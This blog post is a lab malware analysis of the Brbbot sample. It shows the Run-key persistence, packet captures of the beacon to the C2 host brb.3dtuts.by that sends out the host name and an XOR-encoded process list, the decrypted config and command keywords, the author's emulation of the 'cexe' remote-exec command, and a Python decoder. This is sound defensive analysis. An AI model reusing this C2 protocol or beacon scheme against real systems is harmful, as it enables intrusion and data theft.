This post, like all others this month, is part of the series I used to prepare for my GIAC Reverse Engineer Malware (GREM) certification.
In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis to gain insight into the behaviour of the program. Remember, VirusTotal reported that 52 of 74 engines flagged this file as malicious.
The tools used here are:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot
Let's see what the tools above provided us once we executed brbbot.exe on Windows 10 as an administrator.
Looking first at the RegShot comparison summary, we see:
Note that not all of the changes are from running brbbot.exe; other programs that ran during the snapshot window, intentionally or not, contributed too.
Picking a few entries of immediate interest out of the report:

```
Created with Regshot 1.9.1 x64 Unicode (beta r321)
Comments:
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Computer: SECURITYNIK-WIN, SECURITYNIK-WIN
Username: SecurityNik, SecurityNik

Values added:
...
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
...
```

The Run value is the persistence mechanism. The sample was launched from C:\brbbot.exe, yet the autorun entry points at a brbbot.exe under the user's AppData\Roaming folder (presumably a copy the sample dropped there), so that is what will start at each logon. Writing under HKLM rather than HKCU succeeded because the sample was run as administrator. The RecentApps and Compatibility Assistant entries are not the malware's doing: Windows records those itself whenever a new executable is launched. They are still useful forensic evidence that C:\brbbot.exe was run.
Taking a quick look via Process Hacker.
Looking at the General tab.
Peeking into the strings loaded into memory.
Peeking into the modules loaded by brbbot.exe.
Transitioning to ProcDot, where a saved copy of the Process Monitor events is fed to it as the input file.
On the Kali side, INetSim logged the DNS lookup and the HTTP request that followed it:

```
$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none
...
2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name: brb.3dtuts.by
2020-11-08 17:12:52  HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e6008222
82f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e6
03f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60
282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e2
33e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d38333428
2f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e3
5283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e
29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232
b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e35
2f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1
f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934
383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b2934383634357
53e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e60
0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e
, file name: /var/lib/inetsim/http/fakefiles/sample.html
...
```
Moving to the packet capture, the DNS query for brb.3dtuts.by is answered by INetSim (10.0.0.114) with its own address:

```
└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by"
   15 25.543214256   10.0.0.110 → 10.0.0.114   DNS 73 Standard query 0x6a64 A brb.3dtuts.by
   16 25.551623068   10.0.0.114 → 10.0.0.110   DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114
```
Filtering on the HTTP host shows the beaconing pattern: one request every 30 seconds, each from a new source port.

```
└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y
frame.time                       ip.src      tcp.srcport  ip.dst      tcp.dstport  http.host
Nov  8, 2020 17:12:52.715732789 EST  10.0.0.110  4081  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:13:22.745066520 EST  10.0.0.110  4082  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:13:52.763137491 EST  10.0.0.110  4084  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:14:22.782289408 EST  10.0.0.110  4086  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:14:52.826690345 EST  10.0.0.110  4087  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:15:22.865526674 EST  10.0.0.110  4088  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:15:52.908439391 EST  10.0.0.110  4089  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:16:22.928449020 EST  10.0.0.110  4090  10.0.0.114  80  brb.3dtuts.by
Nov  8, 2020 17:16:52.954382147 EST  10.0.0.110  4092  10.0.0.114  80  brb.3dtuts.by
```
Following the first TCP stream gives the full request. The i parameter carries an IP address, c the computer name and p a long hex blob; the response is INetSim's default page.

```
└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80

===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081))
Node 0: 10.0.0.110:4081
Node 1: 10.0.0.114:80
2148
GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=[...same hex value as in the INetSim report above...] HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Connection: Close
Cache-Control: no-cache

	150
HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server

	258
<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>
===================================================================
```

Two details worth keeping as indicators: the User-Agent claims IE 8 on Windows NT 6.1 (Windows 7) although the host is Windows 10, so it is hard-coded in the binary rather than taken from the system, and the i parameter reports a 169.254.x.x link-local address rather than the 10.0.0.110 the traffic actually came from.
To control what the bot receives, I moved from INetSim's fake page to a web server on the Kali box with my own ads.php:

```
└─$ sudo cat /var/www/html/ads.php
<HTML>
<TITLE>SecurityNik ads.php</TITLE>
<BODY>
Welcome to SecurityNik World!
</BODY>
</HTML>
```

The web server's access log shows the same request arriving:

```
10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=[...same hex value as in the INetSim report above...] HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
```
Back on the Windows host, handle64 shows brbbot.exe holding a read handle on brbconfig.tmp, which turns out to be its encrypted configuration file:

```
C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe

Nthandle v4.11 - Handle viewer
Copyright (C) 1997-2017 Mark Russinovich
Sysinternals - www.sysinternals.com
------------------------------------------------------------------------------
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
  108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp
```
Stepping through in the debugger until I found the call to CryptDecrypt, I set a breakpoint on the instruction directly after it. When it hit, the buffer handed to CryptDecrypt held the decrypted content of brbconfig.tmp:

```
"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"
```

Each field maps to behaviour seen elsewhere in this post: uri is the path requested from brb.3dtuts.by; sleep is the pause between beacons in milliseconds, and 30000 matches the 30-second spacing of the requests in the tshark output; encode=5b is the single-byte XOR key applied to the p parameter before it is hex-encoded; exec, file, conf and exit are the commands the bot accepts, each stored as its keyword spelled backwards (cexe, elif, fnoc, tixe), which is the token the server has to return in ads.php to trigger it.
To test the exec command, I served the reversed keyword followed by a program name from ads.php:

```
└─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
└─$ sudo cat /var/www/html/ads.php
cexe notepad.exe
```
On the Windows host, a new notepad.exe now appears every 30 seconds, one per beacon:

```
PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad
```

Every one of them has the same parent, PID 1596:

```
PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672
```

and PID 1596 is brbbot.exe:

```
PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596
```

This confirms the exec command: on each beacon brbbot.exe fetched ads.php, read cexe notepad.exe and spawned notepad.exe as a child process. Note that the command is re-executed on every beacon for as long as ads.php keeps serving it.
The final step is to decode the p parameter from the HTTP request above. The decrypted configuration gave encode=5b: brbbot XORs each byte of the data with 0x5b and then hex-encodes the result, so two layers have to be undone. I copied the value of the p parameter to a file named p-parameter.txt, everything on one line:
```
└─$ cat p-parameter.txt
[...p value as in the INetSim report above, on one line...]

└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw

└─$ cat p-parameter.raw
?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>` .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>` :5>u>#>`▒++728:/245):6>4(/u>#>` )48>((:80>)u>#>`+)48>#+mou>#>` .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>` )48645u>#>` )48645mou>#>` ><(34/v#mov5284?>u>#>`(-834(/u>#>` 2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#>`
```
Hex-decoding alone leaves the XOR layer in place, which is why the output above is still unreadable; the run u>#>` that repeats throughout is .exe; with every byte XORed by 0x5b. Removing that layer as well turns the p parameter into a semicolon-separated list of the processes running on the host (Idle;System;smss.exe;csrss.exe;wininit.exe;...). So along with the IP address (i) and computer name (c), brbbot.exe exfiltrates the running process list on every beacon.
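Putting the configuration and the beacon together, here is an added Python example (mine, not code from the original post or from the Brbbot sample) that parses the decrypted brbconfig.tmp string, takes the XOR key from its encode field, maps the token served in ads.php back to the command it triggers, and decodes the opening part of the p value copied from the INetSim report above. The field meanings come from the config string and the observed behaviour on this page; the one assumption, stated in the code, is that encode holds a single-byte XOR key, which the readable output confirms.

```python
"""Brbbot beacon and configuration decoding (added example, not the post's own code)."""

# Decrypted brbconfig.tmp exactly as dumped after the CryptDecrypt breakpoint.
CONFIG = "uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"

# Opening part of the p= value copied from the INetSim report (real capture data, not constructed).
P_PREFIX = (
    "123f373e600822282f3e366028362828753e233e60"
    "3828292828753e233e602c32353235322f753e233e60"
    "3828292828753e233e602c323537343c3435753e233e60"
    "283e292d32383e28753e233e6037283a2828753e233e60"
    "282d383334282f753e233e603d34352f3f292d3334282f753e233e60"
    "3d34352f3f292d3334282f753e233e60282d383334282f753e233e60"
    "3f2c36753e233e60"
)

# Command keywords the bot understands; the config stores each under its reversed spelling.
COMMANDS = ("exec", "file", "conf", "exit")


def parse_config(text: str) -> dict:
    """Split 'key=value;key=value' into a dict, ignoring empty fields."""
    cfg = {}
    for field in text.split(";"):
        if field:
            key, _, value = field.partition("=")
            cfg[key] = value
    return cfg


def xor_key(cfg: dict) -> int:
    """'encode' is read as a single-byte XOR key written in hex (5b -> 0x5b).
    Assumption: the key is one byte; anything wider is rejected rather than guessed at."""
    key = int(cfg["encode"], 16)
    if not 0 <= key <= 0xFF:
        raise ValueError("encode is not a single byte")
    return key


def beacon_interval_seconds(cfg: dict) -> float:
    """'sleep' is the pause between beacons in milliseconds (30000 -> 30 s, as seen in the pcap)."""
    return int(cfg["sleep"]) / 1000


def parse_command(cfg: dict, body: str):
    """Map the first token of the ads.php body to the command it triggers.
    'cexe notepad.exe' -> ('exec', 'notepad.exe'); an unknown token gives (None, rest)."""
    token, _, arg = body.strip().partition(" ")
    by_token = {cfg[name]: name for name in COMMANDS if name in cfg}
    return by_token.get(token), arg


def decode_p(hex_value: str, key: int) -> str:
    """Undo the beacon encoding: hex -> bytes, then XOR every byte with key.
    Whitespace is dropped first so wrapped terminal output can be pasted as-is."""
    raw = bytes.fromhex("".join(hex_value.split()))
    return bytes(b ^ key for b in raw).decode("latin-1")


def encode_p(plaintext: str, key: int) -> str:
    """The bot's side of the transform, used here only to confirm the round trip."""
    return bytes(b ^ key for b in plaintext.encode("latin-1")).hex()


if __name__ == "__main__":
    cfg = parse_config(CONFIG)
    key = xor_key(cfg)
    print(f"beacon every {beacon_interval_seconds(cfg):.0f} s to /{cfg['uri']}")
    print("C2 body 'cexe notepad.exe' ->", parse_command(cfg, "cexe notepad.exe"))
    print("hex layer only (what xxd -r -p gives):", repr(decode_p(P_PREFIX, 0)[:24]))
    print("hex + XOR 0x5b:", decode_p(P_PREFIX, key))
```

Running it prints the process list Idle;System;smss.exe;csrss.exe;wininit.exe;... from the captured hex, and the key=0 call reproduces the unreadable bytes the xxd step alone produced. Feeding the complete p value from the INetSim report to decode_p gives the full list, ending with brbbot.exe itself.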
References:
- http://jon.glass/blog/Hacking-BRBbot/
- https://www.aldeid.com/wiki/72922cab21d75a9e2da351bda35bdd9f
- Microsoft - x64 Calling Conventions
- Cool Byte - x64 Calling Conventions
- CreateFileA Function
- ReadFile Function
- CyberChef
- SANS FOR610 - Reverse Engineering Malware - GREM